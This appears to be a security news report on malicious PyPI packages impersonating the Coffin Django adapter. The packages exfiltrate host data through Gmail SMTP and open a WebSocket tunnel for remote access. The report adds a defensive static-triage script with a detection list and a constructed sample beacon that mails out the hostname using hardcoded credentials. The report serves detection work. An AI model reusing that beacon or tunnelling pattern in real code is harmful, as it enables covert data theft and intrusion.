
Socket analysts reported their findings to the Python Package Index (PyPI), and malicious packages were removed from it. However, some of them had been present on PyPI for more than four years, and one package was downloaded more than 18,000 times.
Malware was identified in the following packages:
- Coffin-Codes-Pro (9000 downloads);
- Coffin-Codes-NET2 (6200 downloads);
- Coffin-Codes-NET (6100 downloads);
- Coffin-Codes-2022 (18,100 downloads);
- Coffin2022 (6500 downloads);
- Coffin-Grave (6500 downloads); and
- cfc-bsb (2900 downloads).
The malicious Coffin packages pose as the legitimate Coffin adapter that integrates Jinja2 templates into Django projects.
Their malicious functionality includes covert remote access and data exfiltration via Gmail.
The packages use hardcoded credentials to log into the Gmail SMTP server (smtp.) and send the information collected on victim hosts to their operators, which gives the operators a foothold for remote access to the compromised systems. Because Gmail is a widely trusted service, firewalls and EDR systems are unlikely to flag this traffic as suspicious. The hardcoded credentials are themselves a useful indicator: a Python interpreter authenticating to Gmail's SMTP service from a host where no mail client is expected is worth alerting on regardless of the destination's reputation.
After sending the stolen data by email, the malware opens a WebSocket connection over TLS to a remote server and receives instructions for setting up an encrypted, bidirectional tunnel between the host and the attacker.
Using the Client class, the malware forwards traffic from the remote host into the local system, giving the attacker access to internal admin panels and APIs and enabling file transfer, email theft, shell command execution, credential harvesting, and lateral movement.
Based on the email addresses used (e.g. blockchain.), Socket analysts conclude that the primary purpose of the malicious packages is cryptocurrency theft, especially given that similar tactics were previously used to steal Solana private keys.
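As an added example (not code from the original report or from Socket), the script below is a small static triage pass a practitioner could run over an unpacked package to look for the two indicators the text describes: a hardcoded SMTP login and an import of a library used to build the outbound tunnel. The `TUNNEL_MODULES` list and the sample source it scans are constructed for this example; `smtp.gmail.com` in the sample is simply Gmail's public SMTP hostname.

```python
"""Static triage for the tradecraft described above: a hardcoded SMTP login
plus an outbound tunnelling dependency inside a Python package.
Added example for this page, not Socket's tooling; a heuristic, not a verdict."""
import ast
import os
import sys
from dataclasses import dataclass

# Libraries commonly pulled in for the reverse-tunnel stage (assumed list).
TUNNEL_MODULES = {"websocket", "websockets", "socks", "paramiko"}
MAIL_CLASSES = {"SMTP", "SMTP_SSL"}


@dataclass
class Finding:
    kind: str      # "hardcoded-login" | "smtp-host" | "tunnel-import" | "parse-error"
    lineno: int
    detail: str    # host, module or username; never the password itself


def _const_str(node):
    """Return the literal if node is a string constant, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def _call_name(call):
    """Bare or attribute name of the callee, e.g. 'login' for srv.login(...)."""
    if isinstance(call.func, ast.Attribute):
        return call.func.attr
    if isinstance(call.func, ast.Name):
        return call.func.id
    return None


def scan_source(source, filename="<string>"):
    """Walk one module's AST and collect the indicators."""
    try:
        tree = ast.parse(source, filename)
    except SyntaxError as exc:
        return [Finding("parse-error", exc.lineno or 0, str(exc))]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            if isinstance(node, ast.Import):
                roots = [a.name.split(".")[0] for a in node.names]
            else:
                roots = [(node.module or "").split(".")[0]]
            for root in roots:
                if root in TUNNEL_MODULES:
                    findings.append(Finding("tunnel-import", node.lineno, root))
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in MAIL_CLASSES and node.args:
                host = _const_str(node.args[0])
                if host:
                    findings.append(Finding("smtp-host", node.lineno, host))
            elif name == "login" and len(node.args) >= 2:
                user = _const_str(node.args[0])
                # Only flag when both username and password are literals.
                if user and _const_str(node.args[1]) is not None:
                    findings.append(Finding("hardcoded-login", node.lineno, user))
    return findings


def triage(findings):
    """Combine indicators: a literal login plus mail or tunnel use is the pattern."""
    kinds = {f.kind for f in findings}
    if "hardcoded-login" in kinds and kinds & {"smtp-host", "tunnel-import"}:
        return "suspicious"
    if kinds & {"hardcoded-login", "smtp-host", "tunnel-import"}:
        return "review"
    return "clean"


def scan_package_dir(root):
    """Scan every .py file under an unpacked sdist/wheel; path -> findings."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".py"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read(), path)
                if found:
                    results[path] = found
    return results


# Constructed sample mimicking the described beacon; not the real package code.
SAMPLE = '''
import smtplib, ssl, socket
import websocket

def beacon():
    srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    srv.login("dropper@example.com", "hunter2")
    srv.sendmail("dropper@example.com", "dropper@example.com", socket.gethostname())
    ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
'''

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    report = scan_package_dir(target) if target else {"<sample>": scan_source(SAMPLE)}
    for path, found in report.items():
        print(f"{path}: {triage(found)}")
        for f in found:
            print(f"  line {f.lineno}: {f.kind} ({f.detail})")
```

Run it with the path of an unpacked sdist or a `site-packages` directory; with no argument it scans the embedded sample. Credentials assigned to a variable and passed by name are deliberately not resolved here, so a "clean" result only means the crude literal pattern was absent, not that the package is safe.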
